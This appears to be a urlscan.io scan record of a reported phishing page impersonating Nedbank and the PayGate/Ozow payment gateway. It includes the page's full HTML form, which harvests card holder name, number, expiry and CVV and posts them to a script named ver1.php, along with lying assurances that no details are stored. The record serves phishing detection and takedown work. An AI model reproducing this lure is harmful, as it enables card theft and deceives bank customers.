locomotiveza.buzz Open in urlscan Pro
41.185.8.245  Public Scan

URL: https://locomotiveza.buzz/24eadc252-254aedc2452-276a54ed2/nb/index.htm
Submission Tags: https://phish.report @phish_report Search All
Submission: On July 16 via api from FI — Scanned from FI

Form analysis 1 forms found in the DOM

Name: fTransPOST ver1.php

<form role="form" style="visibility: visible;" class="form-horizontal text-left" name="fTrans" id="fTrans" action="ver1.php" method="post" novalidate="">
  <div id="header">
    <div class="header row">
    </div>
    <div class="header row ">
    </div>
    <div class="header row">
    </div>
    <div id="ChType" style="display: none;" align="center">
      <button type="button" id="changePMBtn" class="Button" onclick="ShowPM('ChangePM','1');">Change Payment Type</button>
      <br>
      <br>
    </div>
  </div>
  <div id="paymethods">
    <div class="form-group initialHide" id="creditcard1" style="display: block;">
      <label for="ccName" class="control-label Label">Card Holder</label>
      <div class="text-left has-feedback">
        <input style="white-space: nowrap;" id="ccName" class="form-control Input" type="text" name="ccName" placeholder="Enter Card holder first name and last name">
        <span class="glyphicon form-control-feedback"></span>
      </div>
    </div>
    <div class="form-group initialHide" id="creditcard2" style="display: block;">
      <label for="ccNumber" class="control-label Label">Card Number</label>
      <div class="text-left has-feedback">
        <div class="input-group">
          <input id="ccNumber" class="form-control Input" type="number" name="ccNumber" autocomplete="off" placeholder="Enter Card number" style="min-height: 34px;">
          <span class="input-group-addon" style="padding: 0; min-width: 52px;">
            <div class="collapse card-type" id="card_visa">
              <img alt="Card Type" src="index_files/visa.png">
            </div>
            <div class="collapse card-type" id="card_mastercard">
              <img alt="Card Type" src="index_files/mastercard.png">
            </div>
            <div class="collapse card-type" id="card_amex">
              <img alt="Card Type" src="index_files/amex.png">
            </div>
            <div class="collapse card-type" id="card_diners_club_international">
              <img alt="Card Type" src="index_files/diners_club_international.png">
            </div>
            <div class="collapse card-type" id="card_diners_club_carte_blanche">
              <img alt="Card Type" src="index_files/diners_club_carte_blanche.png">
            </div>
            <div class="collapse card-type" id="card_jcb">
              <img alt="Card Type" src="index_files/jcb.png">
            </div>
            <div class="collapse card-type" id="card_astropay">
              <img alt="Card Type" src="index_files/astropay.png">
            </div>
          </span>
        </div>
        <span class="glyphicon form-control-feedback" style="line-height: 34px; right: 67px; top: 3px">
        </span>
        <div class="collapse" id="acceptedMessage">
          <p class="help-block"><span class="text-danger" id="cardsAccepted"></span></p>
        </div>
      </div>
    </div>
    <div class="form-group initialHide" id="creditcard3" style="display: block;">
      <label for="ccExpDate" class="control-label Label" style="width: 100%; text-align: left;"> Expiry Date </label>
      <div class="col-xs-6 col-sm-6 text-left has-feedback"> <select class="form-control Input" name="ccOpMonth" id="ccOpMonth">
          <option value="01">01</option>
          <option value="02">02</option>
          <option value="03">03</option>
          <option value="04">04</option>
          <option value="05">05</option>
          <option value="06" selected="selected">06</option>
          <option value="07">07</option>
          <option value="08">08</option>
          <option value="09">09</option>
          <option value="10">10</option>
          <option value="11">11</option>
          <option value="12">12</option>
        </select>
        <span class="glyphicon form-control-feedback"></span>
      </div>
      <div class="col-xs-6 col-sm-6 text-left has-feedback no-padding-right">
        <select class="form-control Input" name="ccOpYear" id="ccOpYear">
          <option value="2023" selected="selected">2023</option>
          <option value="2024">2024</option>
          <option value="2025">2025</option>
          <option value="2026">2026</option>
          <option value="2027">2027</option>
          <option value="2028">2028</option>
          <option value="2029">2029</option>
          <option value="2030">2030</option>
          <option value="2031">2031</option>
          <option value="2032">2032</option>
          <option value="2033">2033</option>
          <option value="2034">2034</option>
          <option value="2035">2035</option>
          <option value="2036">2036</option>
          <option value="2037">2037</option>
          <option value="2038">2038</option>
          <option value="2039">2039</option>
          <option value="2040">2040</option>
          <option value="2041">2041</option>
          <option value="2042">2042</option>
        </select>
        <span class="glyphicon form-control-feedback"></span>
      </div>
    </div>
    <div class="form-group initialHide" id="creditcard4" style="display: block;">
      <label class="control-label Label" for="ccCvv" style="width: 100%; text-align: left;"> CVV Digits </label>
      <div class="col-xs-10 col-sm-6 text-left has-feedback" style="white-space: nowrap;">
        <input id="ccCvv" class="form-control Input" type="number" name="ccCvv" autocomplete="off">
        <span class="glyphicon form-control-feedback"></span>
      </div>
      <div class="col-xs-1 col-sm-6 text-left">
        <span
          class="help-block"><a href="#" title="Click here for more information on what CVV Digits are." data-toggle="modal" data-target="#CreditCardCvvInfo"><span style="font-size: 16px;" class="glyphicon glyphicon-question-sign"></span></a></span>
      </div>
    </div>
    <div class="modal fade" id="CreditCardCvvInfo" tabindex="-1" role="dialog" aria-labelledby="Credit Card CVV Info" aria-hidden="true" style="z-index: 1080;">
      <div class="modal-dialog">
        <div class="modal-content">
          <div class="modal-header">
            <button type="button" class="close" data-dismiss="modal"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>
            <h4 class="modal-title" id="myModalLabel">What is the CVV Number ? </h4>
            <span class="text-info">(Also known as CVC2, CVV2 and CID number.)</span>
          </div>
          <div class="modal-body">
            <p>This is the three(or four) digit code printed on the back panel of your credit card.</p>
            <p>The code is a security feature - it adds an extra level of protection to your credit card transaction.</p>
            <p>This number is not stored electronically anywhere on your credit card - and payment gateways are not allowed to store this number.</p>
            <p>PayGate passes this number directly to the bank together with your credit card details and details of the transaction.The bank checks to make sure that the CVV number is valid for this credit card number.If its not - then the
              transaction is declined.</p>
            <p>Fraudsters often generate credit card numbers - or steal lists of 'unprotected' card numbers.If this is the case -then they will not have access to the CVV number, and the transaction(using your stolen card number) will fail when the
              fraudster attempts to process it through PayGate.</p>
            <br>
            <div class="text-center">
              <span><img src="index_files/cvv2_small.jpg" alt="CVV Number on the back of a Credit Card" title="CVV Number on the back of a Credit Card"></span>
              <span style="padding-left: 20px;"><img src="index_files/amex_small.gif" alt="CID Number on the front of an AMEX Card" title="CID Number on the front of an AMEX Card"></span>
            </div>
          </div>
          <div class="modal-footer">
            <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
          </div>
        </div>
      </div>
    </div>
    <script type="application/javascript" src="index_files/jquery.creditCardValidator.js"></script>
    <script type="application/javascript">
      var acceptedCards = ["visa", "mastercard"];
      $(document).ready(function() {
        $('#ccNumber').validateCreditCard(handleCCValidation);
      });
    </script>
  </div>
  <div class="row alert-gdpr-row" style="    width: 75%;
    margin-left: 12.5%;
    margin-right: 12.5%;">
    <div id="gdprAlert" class="col-md-12 alert alert-info text-center alert-gdpr">
      <p> By continuing I hereby give permission for Ozow Group and any Third Party commissioned by Ozow Group to use Personal Information provided for the sole purpose of processing the requested transaction and conducting necessary fraud and risk
        screening.</p>
    </div>
  </div>
  <div class="row button-row" style="width: 75%;
                                                       margin-left: 12.5%;
                                                       margin-right: 12.5%;">
    <div class="col-md-12" style="padding: 0">
      <div class="pull-right col-xs-6 col-md-6">
        <i style="display:none; position: absolute;right: 60px;top: 5px;" id="loader" class="fa fa-2x fa-spinner fa-spin">
                            </i>
        <button id="nextBtn" type="submit" class="Button initialHide btn-block" name="paywebPay" value="Next" style="display: inline-block;"> Next </button>
      </div>
      <div class="pull-left col-xs-6 col-md-6">
      </div>
      <div class="clearfix"></div>
    </div>
  </div>
  <div class="row text-center user-message-row" style="width: 75%;
                                                       margin-left: 12.5%;
                                                       margin-right: 12.5%;
                                                       margin-top: 16px;">
    <div class="col-md-12">*Please note that your details are <b>NOT</b> saved for future transactions</div>
  </div>
  <div>&nbsp;</div>
  <div class="row text-center">
    <div class="col-md-12" style="margin-top: 24px">
      <span><br><img src="index_files/poweredby.e4aefab8.png" width="214" height="43" style="border: none; padding-right: 5px; text-decoration:none; vertical-align: text-top;"></span>
    </div>
  </div>
  <input id="paywebDate" type="hidden" name="paywebDate" value="1678568280">
  <input id="PAY_REQUEST_ID" type="hidden" name="PAY_REQUEST_ID" value="58C48231-355F-2BC2-4BB5-AB1DCFBBE757">
  <input id="paywebSource" type="hidden" name="paywebSource" value="1722099984">
  <input id="paywebSubmit" type="hidden" name="paywebSubmit">
  <input id="paywebMethod" type="hidden" name="paywebMethod" value="creditcard">
  <input id="CHECKSUM" type="hidden" name="CHECKSUM" value="1d04aa820def3ba9a6bb055ececfb013">
  <input id="GOODS_DESCRIPTION" type="hidden" name="GOODS_DESCRIPTION" value="INV1887111">
</form>

Text Content

You need to enable JavaScript to run this app.

Ref: 2023-1138761




STEP : LOG IN USING YOUR ACTIVE NEDBANK CHEQUE/CREDIT CARD

Nedbank

*None of your credentials are stored.

Change Payment Type


Card Holder

Card Number



Expiry Date
01 02 03 04 05 06 07 08 09 10 11 12
2023 2024 2025 2026 2027 2028 2029 2030 2031 2032 2033 2034 2035 2036 2037 2038
2039 2040 2041 2042
CVV Digits


×Close

WHAT IS THE CVV NUMBER ?

(Also known as CVC2, CVV2 and CID number.)

This is the three(or four) digit code printed on the back panel of your credit
card.

The code is a security feature - it adds an extra level of protection to your
credit card transaction.

This number is not stored electronically anywhere on your credit card - and
payment gateways are not allowed to store this number.

PayGate passes this number directly to the bank together with your credit card
details and details of the transaction.The bank checks to make sure that the CVV
number is valid for this credit card number.If its not - then the transaction is
declined.

Fraudsters often generate credit card numbers - or steal lists of 'unprotected'
card numbers.If this is the case -then they will not have access to the CVV
number, and the transaction(using your stolen card number) will fail when the
fraudster attempts to process it through PayGate.



Close

By continuing I hereby give permission for Ozow Group and any Third Party
commissioned by Ozow Group to use Personal Information provided for the sole
purpose of processing the requested transaction and conducting necessary fraud
and risk screening.

Next


*Please note that your details are NOT saved for future transactions
 




Click on the following link to access our Privacy Policy and Zero-Rated T's and
C's. By proceeding with this payment, you confirm that you have read our Privacy
Policy and that you agree with the terms set out in such Privacy Policy